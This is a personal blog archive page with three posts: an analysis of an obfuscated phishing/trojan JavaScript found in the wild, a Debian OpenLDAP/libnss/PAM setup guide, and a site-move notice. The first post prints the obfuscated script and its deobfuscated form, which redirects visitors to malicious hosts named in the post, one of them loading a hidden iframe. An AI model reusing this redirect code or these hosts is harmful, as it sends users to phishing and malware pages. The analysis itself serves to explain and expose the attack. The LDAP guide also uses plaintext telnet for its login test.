Archive

Archive for the ‘Technology’ Category

Oh boy! Obfuscated Trojans oh my.

June 11th, 2010

New phishing/trojan JavaScripts running amok.  Got this gem recently–

<script type=’text/java script’>
function uK(){};
var kV=”;
uK.prototype = {
f : function() {
d=4906;
var w=function(){};
var u=new Date();
var hK=function(){};
var h=’hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^’.replace(/[\^H\!9X]/g, ”);
var n=new Array();
var e=function(){};
var eJ=”;
t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, ”)];
this.nH=false;
eX=2280;
dF=”dF”;
var hN=function(){ return ‘hN’ };
this.g=6633;
var a=”;
dK=”";
function x(b){
var aF=new Array();
this.q=”;
var hKB=false;
var uN=”";
b['hIrBeTf.'.replace(/[\.BTAI]/g, ”)]=h;
this.qO=15083;
uR=”;
var hB=new Date();
s=”s”;
}
var dI=46541;
gN=55114;
this.c=”c”;
nT=”";
this.bG=false;
var m=new Date();
var fJ=49510;
x(t);
this.y=”";
bL=”;
var k=new Date();
var mE=function(){};
}
};
var l=22739;
var tL=new uK();
var p=”";
tL.f();
this.kY=false;
</script>

Which after you remove the huge loads of crap is…

<script type=’text/java script’>
function uK(){};
uK.prototype = {
f : function() {
var h=’http://lendermedia.com/images/z.htm’;
t=document['location'];
function x(b) { b['href']=h; }
x(t);
}
};
var tL=new uK();
tL.f();
</script>

Which is document.location.href = http://lender media.com/images/z.htm which loads this code:

http://zoo jeans.ru:8080/index.php?pid=10 in an invisible iframe

http://told speak.com/ redirects here after 3s

Cute stuff, easy to decipher, but it’ll snag a lot of people since the message is directed from the originating domain back to itself, which is a bit different.

Technology

OpenLDAP, libnss, PAM

November 9th, 2008

To get from a base debian etch (4.0) config to a working basic un/pw/gecos system-auth off ldap config here’s what you do

From a totally minimal base install (minimal, no addition repos), you must at this point have a working network, I’ll leave that to you…

Then…

edit /etc/apt/sources.list to read:

deb http://http.us.debian.org/debian etch main contrib non-free
deb http://security.debian.org/ etch/updates main contrib non-free
deb-src http://http.us.debian.org/debian etch main contrib non-free
deb-src http://security.debian.org/ etch/updates main contrib non-free

Update the system to current:

# apt-get update && apt-get upgrade (say yes if there are any upgrades)

Install what I consider essential apps and a reasonable build environment for later and slapd, libnss-ldap, and libpam-ldap:

# apt-get install autoconf automake1.9 bison build-essential bzip2 colordiff ctags debconf-utils debian-keyring elinks flex gcc-4.1-locales gdb gpm htop ldap-utils libltdl3-dev libmudflap0-dev libnss-ldap libpam-ldap libtool linux-headers-`uname -r` lynx mimedecode mime-support ncftp2 netcat nmap openssh-blacklist openssh-client openssh-server psmisc screen slapd ssh sysstat sysv-rc-conf telnet telnetd urlview vim vim-scripts

Replace /etc/ldap/slapd.conf with the following:

include         /etc/ldap/schema/core.schema
include         /etc/ldap/schema/cosine.schema
include         /etc/ldap/schema/nis.schema
include         /etc/ldap/schema/inetorgperson.schema
include         /etc/ldap/schema/misc.schema

pidfile         /var/run/slapd/slapd.pid
argsfile        /var/run/slapd/slapd.args
loglevel        0
modulepath      /usr/lib/ldap
moduleload      back_bdb
sizelimit 500
tool-threads 1
backend         bdb
checkpoint 512 30

database        bdb
suffix          “dc=fakedom,dc=dom”
rootdn          “cn=admin,dc=fakedom,dc=dom”
rootpw          (run slappasswd and paste output here)
directory       “/var/lib/ldap”
lastmod         on

access to attrs=userPassword,shadowLastChange
by dn=”cn=admin,dc=fakedom,dc=dom” write
by anonymous auth
by self write
by * none

access to *
by dn=”cn=admin,dc=fakedom,dc=dom” write
by * read

Replace /etc/nsswitch.conf with the following:

# /etc/nsswitch.conf
#
# Example configuration of GNU Name Service Switch functionality.
# If you have the `glibc-doc-reference’ and `info’ packages installed, try:
# `info libc “Name Service Switch”‘ for information about this file.

passwd:         compat ldap
group:          compat
shadow:         compat ldap

hosts:          files dns
networks:       files

protocols:      db files
services:       db files
ethers:         db files
rpc:            db files

netgroup:       nis

Replace /etc/libnss-ldap.conf with the following:

base dc=fakedom,dc=dom
uri ldap://127.0.0.1
ldap_version 3
rootbinddn cn=admin,dc=fakedom,dc=dom

Replace  /etc/pam_ldap.conf with the following:

host 127.0.0.1
base dc=fakedom,dc=dom
uri ldap://127.0.0.1
ldap_version 3
rootbinddn cn=admin,dc=fakedom,dc=dom
pam_password exop

Replace /etc/ldap/ldap.conf with the following:

BASE    dc=fakedome, dc=dom
URI     ldap://127.0.0.1

Create a base.ldif file in /tmp to import into the directory to test against:

dn: dc=fakedom,dc=dom
objectClass: top
objectClass: dcObject
objectClass: organization
o: fakedom.dom
dc: fakedom

dn: cn=admin,dc=fakedom,dc=dom
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword: (Paste output from slappasswd)

dn: ou=People,dc=fakedom,dc=dom
ou: People
objectClass: organizationalUnit
objectClass: top

dn: uid=testy,ou=People,dc=fakedom,dc=dom
uid: testy
cn: testy
objectClass: account
objectClass: posixAccount
objectClass: top
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/testy
gecos: Testy,,,,
userPassword: (Paste output from slappasswd)

#/etc/init.d/slapd restart

#ldapadd -x -W -D ‘cn=admin,dc=fakedom,dc=dom’ -f /tmp/base.ldif  (enter password when prompted)

# /etc/init.d/slapd restart

# getent passwd | grep testy (should return testy’s entry)

# /etc/init.d/openbsd-inetd start

# telnet localhost and use testy’s login credentials, if it works you’re set

If it doesn’t… I’m sorry :)

General Stuff, Shadus Ramblings, Technology

The Move Is Done

June 4th, 2007

If you can read this, the move has been completed. Yay.

While I was moving all the domains I changed the software on marcus’ site.  I think the new software better serves the purpose we wanted for the site, although I really need to break the pictures up a bit.   Still waiting for the avengers domain to transfer to do the move for it… *twiddle*.

General Stuff, Technology


Fatal error: Call to undefined function adsensem_ad() in /var/www/obruo.com/htdocs/wp-content/themes/inove/footer.php on line 43